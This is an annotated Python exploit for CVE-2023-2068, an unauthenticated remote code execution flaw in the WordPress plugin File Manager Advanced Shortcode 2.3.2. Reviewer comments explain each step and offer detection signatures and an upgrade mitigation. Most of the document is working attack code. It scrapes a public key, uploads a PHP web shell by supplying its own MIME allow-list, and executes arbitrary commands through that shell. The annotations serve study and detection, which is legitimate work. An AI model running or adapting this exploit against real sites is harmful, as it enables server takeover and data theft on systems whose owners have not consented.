
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068
#
# Reviewer summary (what this proof of concept does, read from the code below):
#   1. GET the site's front page with no credentials and scrape a value named
#      `_fmakey` out of the returned HTML. Because that value is served to any
#      anonymous visitor, it cannot act as an access-control secret.
#   2. POST a hand-built multipart form to wp-admin/admin-ajax.php with
#      action=fma_load_shortcode_fma_ui and cmd=upload; the form itself sets
#      upload_allow=text/x-php and then uploads a PHP file. The weakness this
#      relies on is presumably that the plugin honours the client-supplied
#      upload_allow list (the plugin source is not on this page - confirm).
#   3. On success, the JSON response's "added" entries carry the URL of the
#      uploaded file, which is then requested with ?cmd=<command>.
#
# Detection ideas: POSTs to admin-ajax.php carrying action=fma_load_shortcode_fma_ui
# together with cmd=upload from sessions with no WordPress login cookie, or whose
# upload_allow field lists a PHP MIME type; new .php files written by the web
# server process under content directories; the fixed multipart boundary and
# the spoofed Chrome User-Agent below are weak but cheap signatures.
# Mitigation: upgrade the plugin past the affected 2.3.2 release (see the CVE).

import requests
import json
import pprint  # imported but never used in this script
import sys
import re

# ANSI-coloured status prefixes for console output.
PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

# Argument handling: argv[1] is the host, argv[2] the command to run.
# NOTE(review): the bare `except: pass` swallows the IndexError raised when an
# argument is missing, so the usage line is only printed when IP is falsy; a
# missing argument surfaces later as a NameError on the first use of IP/COMMAND.
try:
    COMMAND = sys.argv[2]
    IP = sys.argv[1]
    if len(COMMAND) > 1:
        pass
    if IP:
        pass
    else:
        print(f'Use: {sys.argv[0]} IP COMMAND')
except:
    pass

url = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel
print(f"{PROCESS} Searching fmakey")

# Step 1: unauthenticated GET of the front page. The regex takes the first line
# containing `_fmakey` and keeps the text between its first pair of single
# quotes. Any failure (no match, network error) prints the same message, and
# the bare except hides the real cause.
# NOTE(review): when this block fails, `fmakey` is never bound, so building the
# form body below raises NameError.
try:
    r = requests.get(url)
    raw_fmakey = r.text
    fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]
    if len(fmakey) == 0:
        print(f"{FAIL} Cannot found fmakey!")
except:
    print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')
# Step 2: the upload request goes to WordPress's generic AJAX endpoint.
url = "http://"+IP+"/wp-admin/admin-ajax.php"
# The boundary in Content-Type must match the one used in `data`; the
# User-Agent mimics a desktop Chrome browser.
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}
# Multipart body assembled by hand. Fields a defender should recognise:
#   action=fma_load_shortcode_fma_ui  -> the plugin AJAX handler being reached
#   cmd=upload, target=l1_Lw          -> upload operation and destination hash
#   _fmakey=<scraped value>           -> the only token sent; no login cookie
#   upload_allow=text/x-php           -> client-supplied allow-list (presumably
#                                        the crux of the vulnerability)
#   upload[] filename=exploit2.php    -> PHP file whose body runs the `cmd`
#                                        query parameter
data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"
r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")  # printed after the request has already been sent
# Step 3: interpret the response. 'errUploadMime' looks like an elFinder-style
# error code for a rejected MIME type (not confirmable from this page); an HTML
# Content-Type means the handler did not return JSON at all. Otherwise the JSON
# "added" list is expected to describe the uploaded file(s) and the loop keeps
# the URL of the last entry.
if 'errUploadMime' in r.text:
    print(f'{FAIL} Exploit failed!')
    sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
    print(f'{FAIL} Exploit failed! Try to change _fmakey')
    sys.exit(0)
else:
    print(f'{SUCCESS} Exploit executed with success!')
    exploited = json.loads(r.text)
    url = ""
    print(f'{PROCESS} Getting URL with webshell')
    for i in exploited["added"]:
        url = i['url']
    print(f"{PROCESS} Executing '{COMMAND}'")
    # Step 4: COMMAND is appended to the query string as-is and the response
    # body is printed verbatim.
    r = requests.get(url+'?cmd='+COMMAND)
    print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)